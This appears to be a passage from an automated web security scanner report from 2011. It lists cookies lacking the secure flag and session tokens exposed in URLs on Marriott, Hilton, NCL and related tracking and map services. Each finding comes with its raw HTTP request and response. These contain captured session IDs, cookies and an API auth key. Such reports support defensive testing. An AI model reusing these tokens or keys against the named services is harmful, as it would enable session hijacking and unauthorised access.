s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dmarriottglobal%253D%252526pid%25253Dwww.marriott.com/reservation/expiredSession.mi%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.marriott.com/reservation/cleanSession.mi%2525253Furl%2525253D/%25252526marshaTimeOut%2525253Dfalse%252526ot%25253DA%3B

Response

HTTP/1.1 302 Moved Temporarily
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://www.marriott.com/
Content-Length: 0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Date: Mon, 03 Oct 2011 12:59:25 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/


8.8. https://www.marriott.com/reservation/expiredSession.mi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /reservation/expiredSession.mi

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /reservation/expiredSession.mi HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.marriott.com/reservation/availability.mi?isSearch=true&propertyCode=BOSLA
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; IS3_History=1317397011-1-67_16-1-__16_; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; ctcData=searchCount_0*resAmount_0*inByTomorrow_true*city_BOS*state_MA*country_US*; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":3,"to":5,"c":"https://www.marriott.com/reservation/availability.mi","lc":{"d4":{"v":3,"s":true,"e":2}},"cd":4,"sd":4,"f":1317646586583}; s_pers=%20s_lv%3D1317646762445%7C1412254762445%3B%20s_lv_s%3DFirst%2520Visit%7C1317648562445%3B; JVMID=pEbizMdcomD167_prd1; MI_SITE=prod3

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Content-Type: text/html; charset=UTF-8
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/
Pragma: no-cache
Vary: Accept-Encoding
Content-Language: en-US
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Mon, 03 Oct 2011 12:59:04 GMT
Content-Length: 25752
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www
...[SNIP]...

8.9. https://www.marriott.com/reservation/rateListMenu.mi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /reservation/rateListMenu.mi

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

    JVMID
    MI_SITE

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /reservation/rateListMenu.mi HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.marriott.com/reservation/availability.mi?isSearch=true&propertyCode=BOSLA
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; IS3_History=1317397011-1-67_16-1-__16_; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; ctcData=searchCount_0*resAmount_0*inByTomorrow_true*city_BOS*state_MA*country_US*; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":3,"to":5,"c":"https://www.marriott.com/reservation/availability.mi","lc":{"d4":{"v":3,"s":true,"e":2}},"cd":4,"sd":4,"f":1317646586583}; s_pers=%20s_lv%3D1317646762445%7C1412254762445%3B%20s_lv_s%3DFirst%2520Visit%7C1317648562445%3B; JVMID=pEbizMdcomD167_prd1; MI_SITE=prod3

Response

HTTP/1.1 302 Moved Temporarily
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://www.marriott.com/reservation/expiredSession.mi
Content-Length: 0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Date: Mon, 03 Oct 2011 12:59:01 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/


8.10. https://www2.ncl.com/vacations

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ncl.com
Path:   /vacations

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

    Cookie
    ak_location
    Ncl_region

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /vacations HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Drupal-Cache: MISS
Last-Modified: Mon, 03 Oct 2011 13:02:52 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1317646972"
X-Ncl-SLog: 10.5.44.30
Content-Type: text/html; charset=utf-8
Date: Mon, 03 Oct 2011 13:02:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Cookie=R1788641230; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:02:53 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:02:53 GMT; path=/; domain=ncl.com
Content-Length: 195543

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...

9. Session token in URL
There are 37 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


9.1. http://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://dev.virtualearth.net
Path:   /webservices/v1/LoggingService/LoggingService.svc/Log

Issue detail

The URL in the request below appears to contain a session token within the query string.

Request

GET /webservices/v1/LoggingService/LoggingService.svc/Log?entry=0&fmt=1&type=3&group=MapControl&name=AJAX&version=6.3.20091207154938.04&session=1317628825862&mkt=en-us&auth=Ahn5L376ymB7iE0SUTiv0-mqke-onEds0hDyR5WF9uaGYphF-L3tsU6i7xcT-B5H&&jsonp=LogCredCB1317629324879& HTTP/1.1
Host: dev.virtualearth.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.marriott.com/search/findHotels.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-BM-Srv: BAYM001206
X-MS-BM-WS-INFO: 0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:56:14 GMT
Content-Length: 155

LogCredCB1317629324879({"sessionId" : "AleGSSu7but6NhatJrQIad0Z2RVOs_jfW517POazgftqzHU5BV5ZM4egl9OKoxqT", "authenticationResultCode" : "ValidCredentials"})

9.2. http://hiltonworldwide.hilton.com/en/ww/ourbestrates/claimform.jhtml

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://hiltonworldwide.hilton.com
Path:   /en/ww/ourbestrates/claimform.jhtml

Issue detail

The URL in the request below appears to contain a session token within the query string.

Request

GET /en/ww/ourbestrates/claimform.jhtml;jsessionid=MXIWSVWTPN352CSGBJC222Q?xch=1041820087,C16BADB2FE2A22CE7D8F31B09490D8B4.etc64& HTTP/1.1
Host: hiltonworldwide.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/customersupport/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; cross-sell=hi; mmcore.tst=0.482; mmid=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317637060085:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 25881
Date: Mon, 03 Oct 2011 13:17:21 GMT
Connection: close
Vary: Accept-Encoding


<html>
<head>
<link rel="stylesheet" href="/en/ww/standard.css" type="text/css">
<link rel="stylesheet" type="text/css" href="brg_style.css" />
<title>Our Best Rates. Guaranteed. Claim Form</ti
...[SNIP]...

9.3. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/StaticMapService.GetMapImage

Issue detail

The URL in the request below appears to contain a session token within the query string.

Request

GET /maps/api/js/StaticMapService.GetMapImage?1m2&1i617249&2i787967&2e1&3u13&4m2&1u716&2u251&5m3&1e0&2b1&5sen-US&token=71119 HTTP/1.1
Host: maps.googleapis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://vacations.rooms.com/wthrooms/HotelDetails?DD=WTHROOMS&searchId=-755244140&packageIndex=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
Date: Mon, 03 Oct 2011 12:45:04 GMT
Expires: Tue, 04 Oct 2011 12:45:04 GMT
Server: staticmap
Content-Length: 81145
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Cache-Control: public, max-age=86400
Age: 1

.PNG
.
...IHDR.............I.2.....PLTE.........(..4$.000<<<(,W$G.,S(8[4O(._,.S4.k8._D.kO$c@0oO<s_,k4GGDOOO[KD___KOwKgKOoO[wSoWK{[Kooo{{{0{.w.c.ko.w{..K..c...O..[ .w<.g$.s(.,.g[.wg..D....w..K..K
...[SNIP]...

9.4. http://marriottinternationa.tt.omtrdc.net/m2/marriottinternationa/mbox/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marriottinternationa.tt.omtrdc.net
Path:   /m2/marriottinternationa/mbox/standard

Issue detail

The URL in the request below appears to contain a session token within the query string.

Request

GET /m2/marriottinternationa/mbox/standard?mboxHost=www.marriott.com&mboxSession=1317646533235-184575&mboxPage=1317646533235-184575&screenHeight=1200&screenWidth=1920&browserWidth=1074&browserHeight=906&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=marriott.com_%2Fdefault.mi_TopOfPage&mboxId=0&mboxTime=1317628533254&mboxURL=http%3A%2F%2Fwww.marriott.com%2Fdefault.mi&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: marriottinternationa.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1317646533235-184575.19; Domain=marriottinternationa.tt.omtrdc.net; Expires=Mon, 17-Oct-2011 12:55:32 GMT; Path=/m2/marriottinternationa
Content-Type: text/javascript
Content-Length: 16822
Date: Mon, 03 Oct 2011 12:55:32 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('marriott.com_/default.mi_TopOfPage',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mb
...[SNIP]...

9.5. http://marriottinternationa.tt.omtrdc.net/m2/marriottinternationa/sc/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marriottinternationa.tt.omtrdc.net
Path:   /m2/marriottinternationa/sc/standard

Issue detail

The URL in the request below appears to contain a session token within the query string.

Request

GET /m2/marriottinternationa/sc/standard?mboxHost=www.marriott.com&mboxSession=1317646533235-184575&mboxPage=1317646533235-184575&screenHeight=1200&screenWidth=1920&browserWidth=1074&browserHeight=906&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=2&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1317628536446&charSet=UTF-8&cookieDomainPeriods=2&pageName=www.marriott.com%2Fdefault.mi&resolution=1920x1200&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkTrackVars=None&linkTrackEvents=None&prop5=US&prop8=Weekday%20%3A%20Monday%20%3A%208%3A30AM&eVar15=Weekday%20%3A%20Monday%20%3A%208%3A30AM&eVar35=First%20Visit&eVar41=US&mboxURL=http%3A%2F%2Fwww.marriott.com%2Fdefault.mi&mboxReferrer=&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: marriottinternationa.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1317646533235-184575; mboxPC=1317646533235-184575.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1317646533235-184575.19; Domain=marriottinternationa.tt.omtrdc.net; Expires=Mon, 17-Oct-2011 12:55:40 GMT; Path=/m2/marriottinternationa
Content-Length: 220
Date: Mon, 03 Oct 2011 12:55:39 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1317646533235-184575.19");mboxFactories.get('default').get('SiteCatalyst: event', 0).setOffer(new mboxOfferD
...[SNIP]...

9.6. http://opentable.tt.omtrdc.net/m2/opentable/mbox/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://opentable.tt.omtrdc.net
Path:   /m2/opentable/mbox/standard

Issue detail

The URL in the request below appears to contain a session token within the query string.

Request

GET /m2/opentable/mbox/standard?mboxHost=www.opentable.com&mboxSession=1317646507167-573607&mboxPage=1317646507167-573607&screenHeight=1200&screenWidth=1920&browserWidth=1074&browserHeight=906&browserTimeOffset=-300&colorDepth=16&mboxXDomain=x-only&mboxCount=1&mbox=mboxInterimTrack&mboxId=0&mboxTime=1317628507182&mboxURL=http%3A%2F%2Fwww.opentable.com%2Finterim.aspx%3Frid%3D90%26restref%3D90%26m%3D4%26t%3Dsingle%26p%3D2%26d%3D10%2F3%2F2011%25207%3A00%2520PM%26rtype%3Dism_mod&mboxReferrer=http%3A%2F%2Fwww.grandcafe-sf.com%2F&mboxVersion=40 HTTP/1.1
Host: opentable.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1317646507167-573607.19; Domain=opentable.tt.omtrdc.net; Expires=Mon, 17-Oct-2011 12:54:46 GMT; Path=/m2/opentable
Content-Type: text/javascript
Content-Length: 97
Date: Mon, 03 Oct 2011 12:54:46 GMT
Server: Test & Target

mboxFactories.get('default').get('mboxInterimTrack',0).setOffer(new mboxOfferDefault()).loaded();

9.7. https://secure.hilton.com/en/hhonors/signup/hhonors_enroll.jhtml

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.hilton.com
Path:   /en/hhonors/signup/hhonors_enroll.jhtml

Issue detail

The response below contains links that appear to contain session tokens (see the href attributes in the response excerpt).

Request

GET /en/hhonors/signup/hhonors_enroll.jhtml HTTP/1.1
Host: secure.hilton.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://secure.hilton.com/en/hi/login/login.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_requestid=21183
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; ClrSSID=1317646383790-9086; mmid=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; JSESSIONID=S2VXAICTPUQJWCSGBIYMVCQ; mmcore.tst=0.960; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635943626:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
Content-Length: 143713
Date: Mon, 03 Oct 2011 12:58:54 GMT
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

   
                           <title>Hilton HHonors (R) Enrollment Form</title>
               
               
...[SNIP]...
<h1>
               <a href="http://hhonors1.hilton.com/en_US/hh/home_index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ"><img id="logo" src="/en/hhonors/media/images/hilton_honors_logo.gif" title="Hilton HHonors Worldwide" alt="Hilton HHonors Worldwide" />
...[SNIP]...
<div id="customer_support"><a href="http://hhonors1.hilton.com/en_US/hh/customersupport.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="customer support">Customer Support</a>
...[SNIP]...
</span>
                                   <a href="https://secure.hilton.com/en/hhonors/help/sign_in_help.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" rel="nofollow" title="Forgot Password">Forgot Password</a>
...[SNIP]...
<li><a href="http://hhonors1.hilton.com/en_US/hh/about/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="About HHonors">About HHonors</a>
...[SNIP]...
<li><a href="http://hhonors1.hilton.com/en_US/hh/points/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Points">Points</a>
...[SNIP]...
<li><a href="http://hhonors1.hilton.com/en_US/hh/rewards/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Rewards">Rewards</a>
...[SNIP]...
</font>By enrolling in Hilton HHonors, I agree to the <a href="http://hhonors.hilton.com/en/hhonors/terms.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ#general">HHonors Program Terms and Conditions</a>
...[SNIP]...
</a> about you,&nbsp;our&nbsp;<a href="http://hhonors.hilton.com/en/hhonors/terms.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ#policy">expiration policy</a>
...[SNIP]...
<img src="/en/crm/media/images/hhonors/icon_padlock.jpg" />&nbsp;<a href="http://hiltonworldwide1.hilton.com/en_US/ww/customersupport/privacy-policy.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">privacy policy</a>
...[SNIP]...
<li class="brandBarLi brandBarLi_CH" id="brandBarLi_CH"><a class="brandBarLiA" href="http://hhonors1.hilton.com/en/ch/home.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_CH');" onmouseout="turnOffPopup('brandBarLi_CH');" onfocus="turnOnPopup('brandBarLi_CH');" onblur="turnOffPopup('brandBarLi_CH');" title="Conrad Hotels &amp; Resorts"><!-- <span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HI" id="brandBarLi_HI"><a class="brandBarLiA" href="http://hhonors1.hilton.com/en_US/hi/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_HI');" onmouseout="turnOffPopup('brandBarLi_HI');" onfocus="turnOnPopup('brandBarLi_HI');" onblur="turnOffPopup('brandBarLi_HI');" title="Hilton Hotels"><!-- <span>
...[SNIP]...
<li class="brandBarLi brandBarLi_DT" id="brandBarLi_DT"><a class="brandBarLiA" href="http://hhonors1.hilton.com/en_US/dt/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_DT');" onmouseout="turnOffPopup('brandBarLi_DT');" onfocus="turnOnPopup('brandBarLi_DT');" onblur="turnOffPopup('brandBarLi_DT');" title="Doubletree"><!-- <span>
...[SNIP]...
<li class="brandBarLi brandBarLi_ES" id="brandBarLi_ES"><a class="brandBarLiA" href="http://hhonors1.hilton.com/en_US/es/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_ES');" onmouseout="turnOffPopup('brandBarLi_ES');"onfocus="turnOnPopup('brandBarLi_ES');" onblur="turnOffPopup('brandBarLi_DT');" title="Embassy Suites Hotels"><!-- <span>
...[SNIP]...
<li class="brandBarLi brandBarLi_GI" id="brandBarLi_GI"><a class="brandBarLiA" href="http://hhonors1.hilton.com/en_US/gi/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_GI');" onmouseout="turnOffPopup('brandBarLi_GI');" onfocus="turnOnPopup('brandBarLi_GI');" onblur="turnOffPopup('brandBarLi_GI');" title="Hilton Garden Inn"><!-- <span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HP" id="brandBarLi_HP"><a class="brandBarLiA" href="http://hhonors1.hilton.com/en_US/hp/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_HP');" onmouseout="turnOffPopup('brandBarLi_HP');" onfocus="turnOnPopup('brandBarLi_HP');" onblur="turnOffPopup('brandBarLi_HP');" title="Hampton Hotels"><!-- <span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HW" id="brandBarLi_HW"><a class="brandBarLiA" href="http://hhonors1.hilton.com/en_US/hw/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_HW');" onmouseout="turnOffPopup('brandBarLi_HW');" onfocus="turnOnPopup('brandBarLi_HW');" onblur="turnOffPopup('brandBarLi_HW');" title="Homewood Suites by Hilton"><!-- <span>
...[SNIP]...
<li><a href="http://hhonors1.hilton.com/en_US/hh/landing/Top_Chicago/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Chicago">Chicago</a>
...[SNIP]...
<li><a href="http://hhonors1.hilton.com/en_US/hh/landing/Top_WashingtonDC/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Washington, D.C.">Washington, D.C.</a>
...[SNIP]...
<li><a href="http://hhonors1.hilton.com/en_US/hh/landing/Top_NewYork/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="New York">New York</a>
...[SNIP]...
<li><a href="http://hhonors1.hilton.com/en_US/hh/landing/Top_Atlanta/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Atlanta">Atlanta</a>
...[SNIP]...
<li><a href="http://hhonors1.hilton.com/en_US/hh/landing/Top_LosAngeles/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Los Angeles">Los Angeles</a>
...[SNIP]...
<li><a href="http://hhonors1.hilton.com/en_US/hh/landing/Top_Orlando/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Orlando">Orlando</a>
...[SNIP]...
<li><a href="http://hhonors1.hilton.com/en_US/hh/landing/Top_Dallas/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Dallas">Dallas</a></li>
           <li><a href="http://hhonors1.hilton.com/en_US/hh/landing/Top_Mexico/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Mexico">Mexico</a></li>
           <li><a href="http://hhonors1.hilton.com/en_US/hh/landing/Top_Toronto/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Toronto">Toronto</a>
...[SNIP]...
<li class="last"><a href="http://hhonors1.hilton.com/en_US/hh/landing/Top_Dest/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Other Regions">Other Regions</a>
...[SNIP]...
<li><a href="http://hhonors1.hilton.com/en_US/hh/faq.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="FAQ">FAQ</a></li>
